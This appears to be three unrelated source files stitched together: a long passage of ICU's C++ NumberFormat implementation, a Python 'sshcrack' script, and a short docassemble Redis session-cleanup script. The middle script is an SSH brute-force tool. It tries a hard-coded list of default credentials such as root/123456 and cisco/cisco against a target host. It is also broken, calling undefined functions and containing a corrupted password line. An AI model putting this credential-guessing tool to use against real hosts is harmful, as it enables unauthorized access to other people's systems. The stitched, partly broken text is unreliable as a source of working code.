NumberFormat::format(double /* unused number */,
UnicodeString& toAppendTo,
FieldPositionIterator* /* unused posIter */,
UErrorCode& status) const
{
if (!U_FAILURE(status)) {
status = U_UNSUPPORTED_ERROR;
}
return toAppendTo;
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
UnicodeString&
NumberFormat::format(int32_t /* unused number */,
UnicodeString& toAppendTo,
FieldPositionIterator* /* unused posIter */,
UErrorCode& status) const
{
if (!U_FAILURE(status)) {
status = U_UNSUPPORTED_ERROR;
}
return toAppendTo;
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
UnicodeString&
NumberFormat::format(int64_t /* unused number */,
UnicodeString& toAppendTo,
FieldPositionIterator* /* unused posIter */,
UErrorCode& status) const
{
if (!U_FAILURE(status)) {
status = U_UNSUPPORTED_ERROR;
}
return toAppendTo;
}
// ------------------------------------------
// These functions add the status code, just fall back to the non-status versions
UnicodeString&
NumberFormat::format(double number,
UnicodeString& appendTo,
FieldPosition& pos,
UErrorCode &status) const {
if(U_SUCCESS(status)) {
return format(number,appendTo,pos);
} else {
return appendTo;
}
}
UnicodeString&
NumberFormat::format(int32_t number,
UnicodeString& appendTo,
FieldPosition& pos,
UErrorCode &status) const {
if(U_SUCCESS(status)) {
return format(number,appendTo,pos);
} else {
return appendTo;
}
}
UnicodeString&
NumberFormat::format(int64_t number,
UnicodeString& appendTo,
FieldPosition& pos,
UErrorCode &status) const {
if(U_SUCCESS(status)) {
return format(number,appendTo,pos);
} else {
return appendTo;
}
}
// -------------------------------------
// Decimal Number format() default implementation
// Subclasses do not normally override this function, but rather the DigitList
// formatting functions..
// The expected call chain from here is
// this function ->
// NumberFormat::format(Formattable ->
// DecimalFormat::format(DigitList
//
// Or, for subclasses of Formattable that do not know about DigitList,
// this Function ->
// NumberFormat::format(Formattable ->
// NumberFormat::format(DigitList ->
// XXXFormat::format(double
UnicodeString&
NumberFormat::format(const StringPiece &decimalNum,
UnicodeString& toAppendTo,
FieldPositionIterator* fpi,
UErrorCode& status) const
{
Formattable f;
f.setDecimalNumber(decimalNum, status);
format(f, toAppendTo, fpi, status);
return toAppendTo;
}
/**
*
// Formats the number object and save the format
// result in the toAppendTo string buffer.
// utility to save/restore state, used in two overloads
// of format(const Formattable&...) below.
*
* Old purpose of ArgExtractor was to avoid const. Not thread safe!
*
* keeping it around as a shim.
*/
class ArgExtractor {
const Formattable* num;
UChar save[4];
UBool fWasCurrency;
public:
ArgExtractor(const NumberFormat& nf, const Formattable& obj, UErrorCode& status);
~ArgExtractor();
const Formattable* number(void) const;
const UChar *iso(void) const;
UBool wasCurrency(void) const;
};
inline const Formattable*
ArgExtractor::number(void) const {
return num;
}
inline UBool
ArgExtractor::wasCurrency(void) const {
return fWasCurrency;
}
inline const UChar *
ArgExtractor::iso(void) const {
return save;
}
ArgExtractor::ArgExtractor(const NumberFormat& /*nf*/, const Formattable& obj, UErrorCode& /*status*/)
: num(&obj), fWasCurrency(FALSE) {
const UObject* o = obj.getObject(); // most commonly o==NULL
const CurrencyAmount* amt;
if (o != NULL && (amt = dynamic_cast<const CurrencyAmount*>(o)) != NULL) {
// getISOCurrency() returns a pointer to internal storage, so we
// copy it to retain it across the call to setCurrency().
//const UChar* curr = amt->getISOCurrency();
u_strcpy(save, amt->getISOCurrency());
num = &amt->getNumber();
fWasCurrency=TRUE;
} else {
save[0]=0;
}
}
ArgExtractor::~ArgExtractor() {
}
UnicodeString& NumberFormat::format(const DigitList &number,
UnicodeString& appendTo,
FieldPositionIterator* posIter,
UErrorCode& status) const {
// DecimalFormat overrides this function, and handles DigitList based big decimals.
// Other subclasses (ChoiceFormat, RuleBasedNumberFormat) do not (yet) handle DigitLists,
// so this default implementation falls back to formatting decimal numbers as doubles.
if (U_FAILURE(status)) {
return appendTo;
}
double dnum = number.getDouble();
format(dnum, appendTo, posIter, status);
return appendTo;
}
UnicodeString&
NumberFormat::format(const DigitList &number,
UnicodeString& appendTo,
FieldPosition& pos,
UErrorCode &status) const {
// DecimalFormat overrides this function, and handles DigitList based big decimals.
// Other subclasses (ChoiceFormat, RuleBasedNumberFormat) do not (yet) handle DigitLists,
// so this default implementation falls back to formatting decimal numbers as doubles.
if (U_FAILURE(status)) {
return appendTo;
}
double dnum = number.getDouble();
format(dnum, appendTo, pos, status);
return appendTo;
}
UnicodeString&
NumberFormat::format(const Formattable& obj,
UnicodeString& appendTo,
FieldPosition& pos,
UErrorCode& status) const
{
if (U_FAILURE(status)) return appendTo;
ArgExtractor arg(*this, obj, status);
const Formattable *n = arg.number();
const UChar *iso = arg.iso();
if(arg.wasCurrency() && u_strcmp(iso, getCurrency())) {
// trying to format a different currency.
// Right now, we clone.
LocalPointer<NumberFormat> cloneFmt((NumberFormat*)this->clone());
cloneFmt->setCurrency(iso, status);
// next line should NOT recurse, because n is numeric whereas obj was a wrapper around currency amount.
return cloneFmt->format(*n, appendTo, pos, status);
}
if (n->isNumeric() && n->getDigitList() != NULL) {
// Decimal Number. We will have a DigitList available if the value was
// set to a decimal number, or if the value originated with a parse.
//
// The default implementation for formatting a DigitList converts it
// to a double, and formats that, allowing formatting classes that don't
// know about DigitList to continue to operate as they had.
//
// DecimalFormat overrides the DigitList formatting functions.
format(*n->getDigitList(), appendTo, pos, status);
} else {
switch (n->getType()) {
case Formattable::kDouble:
format(n->getDouble(), appendTo, pos);
break;
case Formattable::kLong:
format(n->getLong(), appendTo, pos);
break;
case Formattable::kInt64:
format(n->getInt64(), appendTo, pos);
break;
default:
status = U_INVALID_FORMAT_ERROR;
break;
}
}
return appendTo;
}
// -------------------------------------x
// Formats the number object and save the format
// result in the toAppendTo string buffer.
UnicodeString&
NumberFormat::format(const Formattable& obj,
UnicodeString& appendTo,
FieldPositionIterator* posIter,
UErrorCode& status) const
{
if (U_FAILURE(status)) return appendTo;
ArgExtractor arg(*this, obj, status);
const Formattable *n = arg.number();
const UChar *iso = arg.iso();
if(arg.wasCurrency() && u_strcmp(iso, getCurrency())) {
// trying to format a different currency.
// Right now, we clone.
LocalPointer<NumberFormat> cloneFmt((NumberFormat*)this->clone());
cloneFmt->setCurrency(iso, status);
// next line should NOT recurse, because n is numeric whereas obj was a wrapper around currency amount.
return cloneFmt->format(*n, appendTo, posIter, status);
}
if (n->isNumeric() && n->getDigitList() != NULL) {
// Decimal Number
format(*n->getDigitList(), appendTo, posIter, status);
} else {
switch (n->getType()) {
case Formattable::kDouble:
format(n->getDouble(), appendTo, posIter, status);
break;
case Formattable::kLong:
format(n->getLong(), appendTo, posIter, status);
break;
case Formattable::kInt64:
format(n->getInt64(), appendTo, posIter, status);
break;
default:
status = U_INVALID_FORMAT_ERROR;
break;
}
}
return appendTo;
}
// -------------------------------------
UnicodeString&
NumberFormat::format(int64_t number,
UnicodeString& appendTo,
FieldPosition& pos) const
{
// default so we don't introduce a new abstract method
return format((int32_t)number, appendTo, pos);
}
// -------------------------------------
// Parses the string and save the result object as well
// as the final parsed position.
void
NumberFormat::parseObject(const UnicodeString& source,
Formattable& result,
ParsePosition& parse_pos) const
{
parse(source, result, parse_pos);
}
// -------------------------------------
// Formats a double number and save the result in a string.
UnicodeString&
NumberFormat::format(double number, UnicodeString& appendTo) const
{
FieldPosition pos(0);
return format(number, appendTo, pos);
}
// -------------------------------------
// Formats a long number and save the result in a string.
UnicodeString&
NumberFormat::format(int32_t number, UnicodeString& appendTo) const
{
FieldPosition pos(0);
return format(number, appendTo, pos);
}
// -------------------------------------
// Formats a long number and save the result in a string.
UnicodeString&
NumberFormat::format(int64_t number, UnicodeString& appendTo) const
{
FieldPosition pos(0);
return format(number, appendTo, pos);
}
// -------------------------------------
// Parses the text and save the result object. If the returned
// parse position is 0, that means the parsing failed, the status
// code needs to be set to failure. Ignores the returned parse
// position, otherwise.
void
NumberFormat::parse(const UnicodeString& text,
Formattable& result,
UErrorCode& status) const
{
if (U_FAILURE(status)) return;
ParsePosition parsePosition(0);
parse(text, result, parsePosition);
if (parsePosition.getIndex() == 0) {
status = U_INVALID_FORMAT_ERROR;
}
}
CurrencyAmount* NumberFormat::parseCurrency(const UnicodeString& text,
ParsePosition& pos) const {
// Default implementation only -- subclasses should override
Formattable parseResult;
int32_t start = pos.getIndex();
parse(text, parseResult, pos);
if (pos.getIndex() != start) {
UChar curr[4];
UErrorCode ec = U_ZERO_ERROR;
getEffectiveCurrency(curr, ec);
if (U_SUCCESS(ec)) {
LocalPointer<CurrencyAmount> currAmt(new CurrencyAmount(parseResult, curr, ec), ec);
if (U_FAILURE(ec)) {
pos.setIndex(start); // indicate failure
} else {
return currAmt.orphan();
}
}
}
return NULL;
}
// -------------------------------------
// Sets to only parse integers.
void
NumberFormat::setParseIntegerOnly(UBool value)
{
fParseIntegerOnly = value;
}
// -------------------------------------
// Sets whether lenient parse is enabled.
void
NumberFormat::setLenient(UBool enable)
{
fLenient = enable;
}
// -------------------------------------
// Create a number style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createInstance(UErrorCode& status)
{
return createInstance(Locale::getDefault(), UNUM_DECIMAL, status);
}
// -------------------------------------
// Create a number style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createInstance(const Locale& inLocale, UErrorCode& status)
{
return createInstance(inLocale, UNUM_DECIMAL, status);
}
// -------------------------------------
// Create a currency style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createCurrencyInstance(UErrorCode& status)
{
return createCurrencyInstance(Locale::getDefault(), status);
}
// -------------------------------------
// Create a currency style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createCurrencyInstance(const Locale& inLocale, UErrorCode& status)
{
return createInstance(inLocale, UNUM_CURRENCY, status);
}
// -------------------------------------
// Create a percent style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createPercentInstance(UErrorCode& status)
{
return createInstance(Locale::getDefault(), UNUM_PERCENT, status);
}
// -------------------------------------
// Create a percent style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createPercentInstance(const Locale& inLocale, UErrorCode& status)
{
return createInstance(inLocale, UNUM_PERCENT, status);
}
// -------------------------------------
// Create a scientific style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createScientificInstance(UErrorCode& status)
{
return createInstance(Locale::getDefault(), UNUM_SCIENTIFIC, status);
}
// -------------------------------------
// Create a scientific style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createScientificInstance(const Locale& inLocale, UErrorCode& status)
{
return createInstance(inLocale, UNUM_SCIENTIFIC, status);
}
// -------------------------------------
const Locale* U_EXPORT2
NumberFormat::getAvailableLocales(int32_t& count)
{
return Locale::getAvailableLocales(count);
}
// ------------------------------------------
//
// Registration
//
//-------------------------------------------
#if !UCONFIG_NO_SERVICE
// -------------------------------------
class ICUNumberFormatFactory : public ICUResourceBundleFactory {
public:
virtual ~ICUNumberFormatFactory();
protected:
virtual UObject* handleCreate(const Locale& loc, int32_t kind, const ICUService* /* service */, UErrorCode& status) const {
return NumberFormat::makeInstance(loc, (UNumberFormatStyle)kind, status);
}
};
ICUNumberFormatFactory::~ICUNumberFormatFactory() {}
// -------------------------------------
class NFFactory : public LocaleKeyFactory {
private:
NumberFormatFactory* _delegate;
Hashtable* _ids;
public:
NFFactory(NumberFormatFactory* delegate)
: LocaleKeyFactory(delegate->visible() ? VISIBLE : INVISIBLE)
, _delegate(delegate)
, _ids(NULL)
{
}
virtual ~NFFactory();
virtual UObject* create(const ICUServiceKey& key, const ICUService* service, UErrorCode& status) const
{
if (handlesKey(key, status)) {
const LocaleKey& lkey = (const LocaleKey&)key;
Locale loc;
lkey.canonicalLocale(loc);
int32_t kind = lkey.kind();
UObject* result = _delegate->createFormat(loc, (UNumberFormatStyle)kind);
if (result == NULL) {
result = service->getKey((ICUServiceKey&)key /* cast away const */, NULL, this, status);
}
return result;
}
return NULL;
}
protected:
/**
* Return the set of ids that this factory supports (visible or
* otherwise). This can be called often and might need to be
* cached if it is expensive to create.
*/
virtual const Hashtable* getSupportedIDs(UErrorCode& status) const
{
if (U_SUCCESS(status)) {
if (!_ids) {
int32_t count = 0;
const UnicodeString * const idlist = _delegate->getSupportedIDs(count, status);
((NFFactory*)this)->_ids = new Hashtable(status); /* cast away const */
if (_ids) {
for (int i = 0; i < count; ++i) {
_ids->put(idlist[i], (void*)this, status);
}
}
}
return _ids;
}
return NULL;
}
};
NFFactory::~NFFactory()
{
delete _delegate;
delete _ids;
}
class ICUNumberFormatService : public ICULocaleService {
public:
ICUNumberFormatService()
: ICULocaleService(UNICODE_STRING_SIMPLE("Number Format"))
{
UErrorCode status = U_ZERO_ERROR;
registerFactory(new ICUNumberFormatFactory(), status);
}
virtual ~ICUNumberFormatService();
virtual UObject* cloneInstance(UObject* instance) const {
return ((NumberFormat*)instance)->clone();
}
virtual UObject* handleDefault(const ICUServiceKey& key, UnicodeString* /* actualID */, UErrorCode& status) const {
LocaleKey& lkey = (LocaleKey&)key;
int32_t kind = lkey.kind();
Locale loc;
lkey.currentLocale(loc);
return NumberFormat::makeInstance(loc, (UNumberFormatStyle)kind, status);
}
virtual UBool isDefault() const {
return countFactories() == 1;
}
};
ICUNumberFormatService::~ICUNumberFormatService() {}
// -------------------------------------
static void U_CALLCONV initNumberFormatService() {
U_ASSERT(gService == NULL);
ucln_i18n_registerCleanup(UCLN_I18N_NUMFMT, numfmt_cleanup);
gService = new ICUNumberFormatService();
}
static ICULocaleService*
getNumberFormatService(void)
{
umtx_initOnce(gServiceInitOnce, &initNumberFormatService);
return gService;
}
static UBool haveService() {
return !gServiceInitOnce.isReset() && (getNumberFormatService() != NULL);
}
// -------------------------------------
URegistryKey U_EXPORT2
NumberFormat::registerFactory(NumberFormatFactory* toAdopt, UErrorCode& status)
{
ICULocaleService *service = getNumberFormatService();
if (service) {
NFFactory *tempnnf = new NFFactory(toAdopt);
if (tempnnf != NULL) {
return service->registerFactory(tempnnf, status);
}
}
status = U_MEMORY_ALLOCATION_ERROR;
return NULL;
}
// -------------------------------------
UBool U_EXPORT2
NumberFormat::unregister(URegistryKey key, UErrorCode& status)
{
if (U_FAILURE(status)) {
return FALSE;
}
if (haveService()) {
return gService->unregister(key, status);
} else {
status = U_ILLEGAL_ARGUMENT_ERROR;
return FALSE;
}
}
// -------------------------------------
StringEnumeration* U_EXPORT2
NumberFormat::getAvailableLocales(void)
{
ICULocaleService *service = getNumberFormatService();
if (service) {
return service->getAvailableLocales();
}
return NULL; // no way to return error condition
}
#endif /* UCONFIG_NO_SERVICE */
// -------------------------------------
enum { kKeyValueLenMax = 32 };
NumberFormat*
NumberFormat::internalCreateInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
if (kind == UNUM_CURRENCY) {
char cfKeyValue[kKeyValueLenMax] = {0};
UErrorCode kvStatus = U_ZERO_ERROR;
int32_t kLen = loc.getKeywordValue("cf", cfKeyValue, kKeyValueLenMax, kvStatus);
if (U_SUCCESS(kvStatus) && kLen > 0 && uprv_strcmp(cfKeyValue,"account")==0) {
kind = UNUM_CURRENCY_ACCOUNTING;
}
}
#if !UCONFIG_NO_SERVICE
if (haveService()) {
return (NumberFormat*)gService->get(loc, kind, status);
}
#endif
return makeInstance(loc, kind, status);
}
NumberFormat* U_EXPORT2
NumberFormat::createInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
if (kind != UNUM_DECIMAL) {
return internalCreateInstance(loc, kind, status);
}
const SharedNumberFormat *shared = createSharedInstance(loc, kind, status);
if (U_FAILURE(status)) {
return NULL;
}
NumberFormat *result = static_cast<NumberFormat *>((*shared)->clone());
shared->removeRef();
if (result == NULL) {
status = U_MEMORY_ALLOCATION_ERROR;
}
return result;
}
// -------------------------------------
// Checks if the thousand/10 thousand grouping is used in the
// NumberFormat instance.
UBool
NumberFormat::isGroupingUsed() const
{
return fGroupingUsed;
}
// -------------------------------------
// Sets to use the thousand/10 thousand grouping in the
// NumberFormat instance.
void
NumberFormat::setGroupingUsed(UBool newValue)
{
fGroupingUsed = newValue;
}
// -------------------------------------
// Gets the maximum number of digits for the integral part for
// this NumberFormat instance.
int32_t NumberFormat::getMaximumIntegerDigits() const
{
return fMaxIntegerDigits;
}
// -------------------------------------
// Sets the maximum number of digits for the integral part for
// this NumberFormat instance.
void
NumberFormat::setMaximumIntegerDigits(int32_t newValue)
{
fMaxIntegerDigits = uprv_max(0, uprv_min(newValue, gDefaultMaxIntegerDigits));
if(fMinIntegerDigits > fMaxIntegerDigits)
fMinIntegerDigits = fMaxIntegerDigits;
}
// -------------------------------------
// Gets the minimum number of digits for the integral part for
// this NumberFormat instance.
int32_t
NumberFormat::getMinimumIntegerDigits() const
{
return fMinIntegerDigits;
}
// -------------------------------------
// Sets the minimum number of digits for the integral part for
// this NumberFormat instance.
void
NumberFormat::setMinimumIntegerDigits(int32_t newValue)
{
fMinIntegerDigits = uprv_max(0, uprv_min(newValue, gDefaultMinIntegerDigits));
if(fMinIntegerDigits > fMaxIntegerDigits)
fMaxIntegerDigits = fMinIntegerDigits;
}
// -------------------------------------
// Gets the maximum number of digits for the fractional part for
// this NumberFormat instance.
int32_t
NumberFormat::getMaximumFractionDigits() const
{
return fMaxFractionDigits;
}
// -------------------------------------
// Sets the maximum number of digits for the fractional part for
// this NumberFormat instance.
void
NumberFormat::setMaximumFractionDigits(int32_t newValue)
{
fMaxFractionDigits = uprv_max(0, uprv_min(newValue, gDefaultMaxIntegerDigits));
if(fMaxFractionDigits < fMinFractionDigits)
fMinFractionDigits = fMaxFractionDigits;
}
// -------------------------------------
// Gets the minimum number of digits for the fractional part for
// this NumberFormat instance.
int32_t
NumberFormat::getMinimumFractionDigits() const
{
return fMinFractionDigits;
}
// -------------------------------------
// Sets the minimum number of digits for the fractional part for
// this NumberFormat instance.
void
NumberFormat::setMinimumFractionDigits(int32_t newValue)
{
fMinFractionDigits = uprv_max(0, uprv_min(newValue, gDefaultMinIntegerDigits));
if (fMaxFractionDigits < fMinFractionDigits)
fMaxFractionDigits = fMinFractionDigits;
}
// -------------------------------------
void NumberFormat::setCurrency(const UChar* theCurrency, UErrorCode& ec) {
if (U_FAILURE(ec)) {
return;
}
if (theCurrency) {
u_strncpy(fCurrency, theCurrency, 3);
fCurrency[3] = 0;
} else {
fCurrency[0] = 0;
}
}
const UChar* NumberFormat::getCurrency() const {
return fCurrency;
}
void NumberFormat::getEffectiveCurrency(UChar* result, UErrorCode& ec) const {
const UChar* c = getCurrency();
if (*c != 0) {
u_strncpy(result, c, 3);
result[3] = 0;
} else {
const char* loc = getLocaleID(ULOC_VALID_LOCALE, ec);
if (loc == NULL) {
loc = uloc_getDefault();
}
ucurr_forLocale(loc, result, 4, &ec);
}
}
//----------------------------------------------------------------------
void NumberFormat::setContext(UDisplayContext value, UErrorCode& status)
{
if (U_FAILURE(status))
return;
if ( (UDisplayContextType)((uint32_t)value >> 8) == UDISPCTX_TYPE_CAPITALIZATION ) {
fCapitalizationContext = value;
} else {
status = U_ILLEGAL_ARGUMENT_ERROR;
}
}
UDisplayContext NumberFormat::getContext(UDisplayContextType type, UErrorCode& status) const
{
if (U_FAILURE(status))
return (UDisplayContext)0;
if (type != UDISPCTX_TYPE_CAPITALIZATION) {
status = U_ILLEGAL_ARGUMENT_ERROR;
return (UDisplayContext)0;
}
return fCapitalizationContext;
}
// -------------------------------------
// Creates the NumberFormat instance of the specified style (number, currency,
// or percent) for the desired locale.
static void U_CALLCONV nscacheInit() {
U_ASSERT(NumberingSystem_cache == NULL);
ucln_i18n_registerCleanup(UCLN_I18N_NUMFMT, numfmt_cleanup);
UErrorCode status = U_ZERO_ERROR;
NumberingSystem_cache = uhash_open(uhash_hashLong,
uhash_compareLong,
NULL,
&status);
if (U_FAILURE(status)) {
// Number Format code will run with no cache if creation fails.
NumberingSystem_cache = NULL;
return;
}
uhash_setValueDeleter(NumberingSystem_cache, deleteNumberingSystem);
}
template<> U_I18N_API
const SharedNumberFormat *LocaleCacheKey<SharedNumberFormat>::createObject(
const void * /*unused*/, UErrorCode &status) const {
const char *localeId = fLoc.getName();
NumberFormat *nf = NumberFormat::internalCreateInstance(
localeId, UNUM_DECIMAL, status);
if (U_FAILURE(status)) {
return NULL;
}
SharedNumberFormat *result = new SharedNumberFormat(nf);
if (result == NULL) {
status = U_MEMORY_ALLOCATION_ERROR;
delete nf;
return NULL;
}
result->addRef();
return result;
}
const SharedNumberFormat* U_EXPORT2
NumberFormat::createSharedInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
if (U_FAILURE(status)) {
return NULL;
}
if (kind != UNUM_DECIMAL) {
status = U_UNSUPPORTED_ERROR;
return NULL;
}
const SharedNumberFormat *result = NULL;
UnifiedCache::getByLocale(loc, result, status);
return result;
}
UBool
NumberFormat::isStyleSupported(UNumberFormatStyle style) {
return gLastResortNumberPatterns[style] != NULL;
}
NumberFormat*
NumberFormat::makeInstance(const Locale& desiredLocale,
UNumberFormatStyle style,
UErrorCode& status) {
return makeInstance(desiredLocale, style, false, status);
}
NumberFormat*
NumberFormat::makeInstance(const Locale& desiredLocale,
UNumberFormatStyle style,
UBool mustBeDecimalFormat,
UErrorCode& status) {
if (U_FAILURE(status)) return NULL;
if (style < 0 || style >= UNUM_FORMAT_STYLE_COUNT) {
status = U_ILLEGAL_ARGUMENT_ERROR;
return NULL;
}
// Some styles are not supported. This is a result of merging
// the @draft ICU 4.2 NumberFormat::EStyles into the long-existing UNumberFormatStyle.
// Ticket #8503 is for reviewing/fixing/merging the two relevant implementations:
// this one and unum_open().
// The UNUM_PATTERN_ styles are not supported here
// because this method does not take a pattern string.
if (!isStyleSupported(style)) {
status = U_UNSUPPORTED_ERROR;
return NULL;
}
#if U_PLATFORM_USES_ONLY_WIN32_API
if (!mustBeDecimalFormat) {
char buffer[8];
int32_t count = desiredLocale.getKeywordValue("compat", buffer, sizeof(buffer), status);
// if the locale has "@compat=host", create a host-specific NumberFormat
if (U_SUCCESS(status) && count > 0 && uprv_strcmp(buffer, "host") == 0) {
Win32NumberFormat *f = NULL;
UBool curr = TRUE;
switch (style) {
case UNUM_DECIMAL:
curr = FALSE;
// fall-through
case UNUM_CURRENCY:
case UNUM_CURRENCY_ISO: // do not support plural formatting here
case UNUM_CURRENCY_PLURAL:
case UNUM_CURRENCY_ACCOUNTING:
case UNUM_CASH_CURRENCY:
case UNUM_CURRENCY_STANDARD:
f = new Win32NumberFormat(desiredLocale, curr, status);
if (U_SUCCESS(status)) {
return f;
}
delete f;
break;
default:
break;
}
}
}
#endif
// Use numbering system cache hashtable
umtx_initOnce(gNSCacheInitOnce, &nscacheInit);
// Get cached numbering system
LocalPointer<NumberingSystem> ownedNs;
NumberingSystem *ns = NULL;
if (NumberingSystem_cache != NULL) {
// TODO: Bad hash key usage, see ticket #8504.
int32_t hashKey = desiredLocale.hashCode();
Mutex lock(&nscacheMutex);
ns = (NumberingSystem *)uhash_iget(NumberingSystem_cache, hashKey);
if (ns == NULL) {
ns = NumberingSystem::createInstance(desiredLocale,status);
uhash_iput(NumberingSystem_cache, hashKey, (void*)ns, &status);
}
} else {
ownedNs.adoptInstead(NumberingSystem::createInstance(desiredLocale,status));
ns = ownedNs.getAlias();
}
// check results of getting a numbering system
if (U_FAILURE(status)) {
return NULL;
}
if (mustBeDecimalFormat && ns->isAlgorithmic()) {
status = U_UNSUPPORTED_ERROR;
return NULL;
}
LocalPointer<DecimalFormatSymbols> symbolsToAdopt;
UnicodeString pattern;
LocalUResourceBundlePointer ownedResource(ures_open(NULL, desiredLocale.getName(), &status));
if (U_FAILURE(status)) {
return NULL;
}
else {
// Loads the decimal symbols of the desired locale.
symbolsToAdopt.adoptInsteadAndCheckErrorCode(new DecimalFormatSymbols(desiredLocale, status), status);
if (U_FAILURE(status)) {
return NULL;
}
UResourceBundle *resource = ownedResource.orphan();
UResourceBundle *numElements = ures_getByKeyWithFallback(resource, gNumberElements, NULL, &status);
resource = ures_getByKeyWithFallback(numElements, ns->getName(), resource, &status);
resource = ures_getByKeyWithFallback(resource, gPatterns, resource, &status);
ownedResource.adoptInstead(resource);
int32_t patLen = 0;
const UChar *patResStr = ures_getStringByKeyWithFallback(resource, gFormatKeys[style], &patLen, &status);
// Didn't find a pattern specific to the numbering system, so fall back to "latn"
if ( status == U_MISSING_RESOURCE_ERROR && uprv_strcmp(gLatn,ns->getName())) {
status = U_ZERO_ERROR;
resource = ures_getByKeyWithFallback(numElements, gLatn, resource, &status);
resource = ures_getByKeyWithFallback(resource, gPatterns, resource, &status);
patResStr = ures_getStringByKeyWithFallback(resource, gFormatKeys[style], &patLen, &status);
}
ures_close(numElements);
// Creates the specified decimal format style of the desired locale.
pattern.setTo(TRUE, patResStr, patLen);
}
if (U_FAILURE(status)) {
return NULL;
}
if(style==UNUM_CURRENCY || style == UNUM_CURRENCY_ISO || style == UNUM_CURRENCY_ACCOUNTING
|| style == UNUM_CASH_CURRENCY || style == UNUM_CURRENCY_STANDARD){
const UChar* currPattern = symbolsToAdopt->getCurrencyPattern();
if(currPattern!=NULL){
pattern.setTo(currPattern, u_strlen(currPattern));
}
}
NumberFormat *f;
if (ns->isAlgorithmic()) {
UnicodeString nsDesc;
UnicodeString nsRuleSetGroup;
UnicodeString nsRuleSetName;
Locale nsLoc;
URBNFRuleSetTag desiredRulesType = URBNF_NUMBERING_SYSTEM;
nsDesc.setTo(ns->getDescription());
int32_t firstSlash = nsDesc.indexOf(gSlash);
int32_t lastSlash = nsDesc.lastIndexOf(gSlash);
if ( lastSlash > firstSlash ) {
CharString nsLocID;
nsLocID.appendInvariantChars(nsDesc.tempSubString(0, firstSlash), status);
nsRuleSetGroup.setTo(nsDesc,firstSlash+1,lastSlash-firstSlash-1);
nsRuleSetName.setTo(nsDesc,lastSlash+1);
nsLoc = Locale::createFromName(nsLocID.data());
UnicodeString SpelloutRules = UNICODE_STRING_SIMPLE("SpelloutRules");
if ( nsRuleSetGroup.compare(SpelloutRules) == 0 ) {
desiredRulesType = URBNF_SPELLOUT;
}
} else {
nsLoc = desiredLocale;
nsRuleSetName.setTo(nsDesc);
}
RuleBasedNumberFormat *r = new RuleBasedNumberFormat(desiredRulesType,nsLoc,status);
if (r == NULL) {
status = U_MEMORY_ALLOCATION_ERROR;
return NULL;
}
r->setDefaultRuleSet(nsRuleSetName,status);
f = r;
} else {
// replace single currency sign in the pattern with double currency sign
// if the style is UNUM_CURRENCY_ISO
if (style == UNUM_CURRENCY_ISO) {
pattern.findAndReplace(UnicodeString(TRUE, gSingleCurrencySign, 1),
UnicodeString(TRUE, gDoubleCurrencySign, 2));
}
// "new DecimalFormat()" does not adopt the symbols if its memory allocation fails.
DecimalFormatSymbols *syms = symbolsToAdopt.orphan();
DecimalFormat* df = new DecimalFormat(pattern, syms, style, status);
// if it is cash currency style, setCurrencyUsage with usage
if (style == UNUM_CASH_CURRENCY){
df->setCurrencyUsage(UCURR_USAGE_CASH, &status);
}
if (U_FAILURE(status)) {
delete df;
return NULL;
}
f = df;
if (f == NULL) {
delete syms;
status = U_MEMORY_ALLOCATION_ERROR;
return NULL;
}
}
f->setLocaleIDs(ures_getLocaleByType(ownedResource.getAlias(), ULOC_VALID_LOCALE, &status),
ures_getLocaleByType(ownedResource.getAlias(), ULOC_ACTUAL_LOCALE, &status));
if (U_FAILURE(status)) {
delete f;
return NULL;
}
return f;
}
U_NAMESPACE_END
#endif /* #if !UCONFIG_NO_FORMATTING */
//eof
| 18,856 |
4,611 | #sshcrack 1.0
#author: k8gege
#https://www.cnblogs.com/k8gege
#https://github.com/k8gege
import paramiko
import sys
import logging
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logging.raiseExceptions=False
def checkSSH(host,port,user,pwd):
try:
ssh.connect(host,port,user,pwd)
print host+' '+port+' '+user+' '+pwd+' LoginOK'
checkDns()
checkPing()
except:
pass
host=sys.argv[1]
port=sys.argv[2]
user=sys.argv[3]
pwd=<PASSWORD>[4]
type=sys.argv[5]
if type=='-test':
checkSSH(host,port,user,pwd)
elif type=='-crack':
checkSSH(host,port,'root','123456')
checkSSH(host,port,'root','cisco')
checkSSH(host,port,'root','Cisco')
checkSSH(host,port,'admin','123456')
checkSSH(host,port,'cisco','123456')
checkSSH(host,port,'cisco','cisco')
checkSSH(host,port,'Cisco','Cisco')
checkSSH(host,port,'cisco','cisco123')
checkSSH(host,port,'admin','admin')
checkSSH(host,port,'root','Admin')
checkSSH(host,port,'root','toor')
checkSSH(host,port,'root','Admin123')
checkSSH(host,port,'root','system')
checkSSH(host,port,'root','system123')
checkSSH(host,port,'root','System')
checkSSH(host,port,'root','System123')
checkSSH(host,port,'root','Admin123!@#')
checkSSH(host,port,'root','root123!@#')
checkSSH(host,port,'root','root2019')
checkSSH(host,port,'root','root2018')
checkSSH(host,port,'root','root2017')
checkSSH(host,port,'root','root2016')
checkSSH(host,port,'root','root2015')
checkSSH(host,port,'root','root2014')
checkSSH(host,port,'root','root2013')
checkSSH(host,port,'root','root2012')
else:
checkSSH(host,port,user,pwd) | 723 |
568 | <filename>docassemble_webapp/docassemble/webapp/cleanup_sessions.py<gh_stars>100-1000
import sys
from docassemble.base.config import daconfig
from docassemble.webapp.app_object import app
from docassemblekvsession import KVSessionExtension
from simplekv.memory.redisstore import RedisStore
import docassemble.base.config
docassemble.base.config.load(arguments=sys.argv)
import docassemble.base.util
import docassemble.webapp.daredis
store = RedisStore(docassemble.webapp.daredis.r_store)
kv_session = KVSessionExtension(store, app)
with app.app_context():
kv_session.cleanup_sessions()
| 203 |
